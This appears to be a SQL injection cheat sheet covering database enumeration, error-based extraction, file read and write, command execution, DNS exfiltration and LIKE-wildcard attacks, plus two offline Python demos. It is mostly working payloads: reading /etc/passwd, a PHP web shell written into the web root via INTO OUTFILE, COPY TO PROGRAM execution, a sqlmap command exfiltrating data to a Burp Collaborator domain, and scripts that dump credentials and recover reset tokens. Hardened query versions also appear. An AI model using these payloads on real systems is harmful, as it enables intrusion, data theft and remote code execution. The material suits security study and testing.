SQL Injection
Database enumeration
MySQL
SELECT GROUP_CONCAT(schema_name SEPARATOR ',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name SEPARATOR ',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM information_schema.columns WHERE table_name = 'users';
GROUP_CONCAT output is silently truncated at group_concat_max_len (1024 bytes by default), so page through long lists with LIMIT/OFFSET when the result looks cut off. information_schema.tables lists every schema, including mysql and performance_schema; restrict on table_schema (for example to database()) to see only the application's tables, and bear in mind that a table name such as users may exist in more than one schema.
PostgreSQL
SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';
These views also return the pg_catalog and information_schema objects; filtering on table_schema removes that noise and makes the application tables stand out.
SQLite
SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');
In SQLite the second argument of GROUP_CONCAT is the separator, unlike MySQL. PRAGMA_TABLE_INFO as a table-valued function needs SQLite 3.16 or later; on older builds, read the column names out of the CREATE statement returned by the second query.
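The enumeration queries above are only useful once they can be smuggled through an injection point. As an added example (not code from the original page), the following drives the SQLite queries through a UNION injection against a deliberately vulnerable search function and shows the hardened, parameterised form beside it. SQLite is used because it runs offline; the products/users tables, their rows and the search function are constructed for the illustration.

```python
"""
Added example (not from the original page): the SQLite enumeration queries,
driven through a UNION-based injection against a deliberately vulnerable
search function. Runs offline on an in-memory sqlite3 database whose schema
and rows are constructed here.
"""
from __future__ import annotations

import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample schema. No AUTOINCREMENT, so no sqlite_sequence table appears."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'apple'), (2, 'banana');
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
        """
    )
    return db


def search_products(db: sqlite3.Connection, term: str) -> list[str]:
    """Vulnerable on purpose: the search term is interpolated into the SQL text."""
    sql = f"SELECT name FROM products WHERE name LIKE '%{term}%'"
    return [row[0] for row in db.execute(sql)]


def inject(db: sqlite3.Connection, select_clause: str) -> str:
    """Hijack the single-column SELECT with a UNION; '--' comments out the trailing %'."""
    payload = f"x' UNION {select_clause}--"
    rows = search_products(db, payload)
    # 'x' matches no product name, so the only row is the one the UNION contributed
    return rows[0] if rows else ""


def enumerate_sqlite(db: sqlite3.Connection) -> dict[str, str]:
    """Run the page's enumeration queries through the injection point, then dump users."""
    tables = inject(db, "SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master "
                        "WHERE type='table' AND tbl_name NOT LIKE 'sqlite_%'")
    ddl = inject(db, "SELECT sql FROM sqlite_master WHERE tbl_name='users'")
    columns = inject(db, "SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users')")
    creds = inject(db, "SELECT GROUP_CONCAT(username||':'||password,',') FROM users")
    return {"tables": tables, "users_ddl": ddl, "users_columns": columns, "creds": creds}


def search_products_safe(db: sqlite3.Connection, term: str) -> list[str]:
    """Hardened form: the value is bound, so a payload is just an odd search term."""
    rows = db.execute("SELECT name FROM products WHERE name LIKE '%' || ? || '%'", (term,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = build_db()
    for key, value in enumerate_sqlite(db).items():
        print(f"{key}: {value}")
    print("hardened query with the same payload:", search_products_safe(db, "x' UNION SELECT 1--"))
```

The UNION must match the column count of the original SELECT (one here); against a multi-column query, pad the injected SELECT with NULLs until the error disappears. The `NOT LIKE 'sqlite_%'` filter keeps the internal sqlite_* tables out of the listing.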
Error based
PostgreSQL
' AND 1=CAST((SELECT username FROM users LIMIT 1) AS int)--
The cast fails and PostgreSQL echoes the offending value in the error text, e.g. invalid input syntax for type integer: "admin". The subquery must return exactly one row (hence LIMIT 1; with more rows the error is the uninformative "more than one row returned by a subquery"); walk the table with LIMIT 1 OFFSET n. This only works when the application returns or reflects the database error; otherwise fall back to a blind technique.
File read/write & RCE
PostgreSQL
SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';
pg_ls_dir and pg_read_file require superuser or, from PostgreSQL 11, a role granted pg_read_server_files or EXECUTE on the function. COPY ... TO PROGRAM requires superuser or pg_execute_server_program and runs the command as the OS user owning the server process (usually postgres). COPY is a separate statement, so the injection point must allow stacked queries; the sleep is only a time-based proof that execution works.
MySQL
SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST["c"]); ?>' INTO OUTFILE '/var/www/html/shell.php';
Both need the FILE privilege and are governed by the secure_file_priv system variable: an empty value allows any path, a directory restricts reads and writes to that directory, and NULL disables file I/O entirely. LOAD_FILE returns NULL rather than an error when the file is unreadable by the mysqld OS user or exceeds max_allowed_packet. INTO OUTFILE refuses to overwrite an existing file, the target directory must be writable by the mysqld user, and the path must be served by the web server; the array key is quoted because an unquoted bareword index is a fatal error on PHP 8.
Faster Exfiltration via DNS
- https://github.com/PortSwigger/sqlmap-dns-collaborator
- https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf
SqlmapDnsCollaborator is a Burp extension that lets Sqlmap perform DNS exfiltration with no configuration. You do not need a domain name or a public IP, just a computer with Sqlmap and Burp.
How you would normally perform DNS exfiltration with Sqlmap:
- You buy a domain name, obtain a public IP and set up a server that is the authoritative nameserver for that domain.
- You run Sqlmap on that server with root/administrator privileges so it can bind UDP port 53; it performs the SQL injection against the vulnerable target.
- Vulnerable target sends DNS requests to your DNS server containing interesting data.
- DNS requests are interpreted by Sqlmap.
How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:
- You open Burp on your computer and enable SqlmapDnsCollaborator.
- You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
- Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
- SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
- DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3
The technique relies on the DBMS being able to trigger an outbound DNS lookup; sqlmap implements it for MySQL, PostgreSQL, Microsoft SQL Server and Oracle. It pays off for blind injections, where each resolved name carries a chunk of data in a single request instead of one bit per request.
SQL "LIKE" Wildcard Injection
This vulnerability, often overlooked and rated low risk, can have significant impact in certain scenarios. It consists of injecting wildcard characters into the value matched by a LIKE clause.
Types of Wildcards
- % : matches any string of zero or more characters.
- _ : matches exactly one character.
Vulnerability
An application becomes vulnerable when it uses the LIKE operator with a user-supplied parameter without escaping these wildcards. For example:
SELECT text FROM table WHERE secrets LIKE '$secret'
Even if the $secret parameter is sanitized against classic SQL injection (quotes escaped or the value bound as a parameter), the wildcards are still interpreted:
http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________
Each "_" stands in for one unknown character of the secret, so the query matches as long as the guessed prefix is correct. An attacker first finds the secret's length by submitting underscores only, then recovers it one character at a time, which costs at most (alphabet size x length) requests instead of (alphabet size ^ length). A lone % matches any secret and bypasses the check outright. Fix it by comparing with = when no pattern matching is intended, or by escaping % and _ in the input and declaring the escape character with ESCAPE.
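The attack above, worked through end to end as an added example (not code from the original page): a reset-token check that doubles quotes but lets LIKE wildcards through, the oracle-driven recovery that exploits it, and two hardened versions (plain equality, and LIKE with the wildcards escaped). It runs offline on an in-memory sqlite3 database; the password_resets table, the hex alphabet and the token value are constructed for the illustration.

```python
"""
Added example (not from the original page): LIKE wildcard injection against a
reset-token check, the per-character recovery it enables, and the fix.
Runs offline against an in-memory sqlite3 database with a constructed token.
"""
from __future__ import annotations

import sqlite3
import string
from typing import Callable

ALPHABET = string.digits + "abcdef"   # assumption: tokens are lowercase hex


def build_db(token: str) -> sqlite3.Connection:
    """Constructed table holding one outstanding reset token."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE password_resets (user_id INTEGER, token TEXT)")
    db.execute("INSERT INTO password_resets VALUES (?, ?)", (1, token))
    return db


def token_valid_vulnerable(db: sqlite3.Connection, secret: str) -> bool:
    """Quotes are doubled, so classic injection fails, but % and _ reach LIKE untouched."""
    sanitized = secret.replace("'", "''")
    sql = f"SELECT 1 FROM password_resets WHERE token LIKE '{sanitized}'"
    return db.execute(sql).fetchone() is not None


def token_valid_fixed(db: sqlite3.Connection, secret: str) -> bool:
    """Equality with a bound parameter: no pattern matching happens at all."""
    row = db.execute("SELECT 1 FROM password_resets WHERE token = ?", (secret,)).fetchone()
    return row is not None


def escape_like(value: str, esc: str = "\\") -> str:
    """For cases where LIKE is genuinely wanted: neutralise %, _ and the escape char itself."""
    return value.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")


def token_valid_like_escaped(db: sqlite3.Connection, secret: str) -> bool:
    """LIKE kept, but user wildcards are escaped and ESCAPE declares the escape character."""
    row = db.execute("SELECT 1 FROM password_resets WHERE token LIKE ? ESCAPE '\\'",
                     (escape_like(secret),)).fetchone()
    return row is not None


def recover_token(oracle: Callable[[str], bool], max_len: int = 64) -> tuple[str, int]:
    """Find the length with underscore-only probes, then fix one character per position.
    Returns (recovered token, number of oracle calls); ('' , calls) if the oracle never matches."""
    queries = 0
    length = None
    for n in range(1, max_len + 1):
        queries += 1
        if oracle("_" * n):
            length = n
            break
    if length is None:
        return "", queries
    known = ""
    for pos in range(length):
        for ch in ALPHABET:
            queries += 1
            if oracle(known + ch + "_" * (length - pos - 1)):
                known += ch
                break
        else:
            raise RuntimeError("token contains a character outside the assumed alphabet")
    return known, queries


if __name__ == "__main__":
    db = build_db("a3f9c0d7")  # constructed secret
    token, calls = recover_token(lambda s: token_valid_vulnerable(db, s))
    print(f"recovered {token!r} in {calls} requests (blind guessing: up to 16**8)")
    print("bypass with a lone %:", token_valid_vulnerable(db, "%"))
    print("same probes against the fixed check:", recover_token(lambda s: token_valid_fixed(db, s)))
```

The cost is linear in the token length because every probe answers one yes/no question about a single position. Against the fixed check, the underscore probes never match, so recover_token exhausts max_len and gives up; a lone `%` is likewise rejected once it is escaped or the comparison uses `=`.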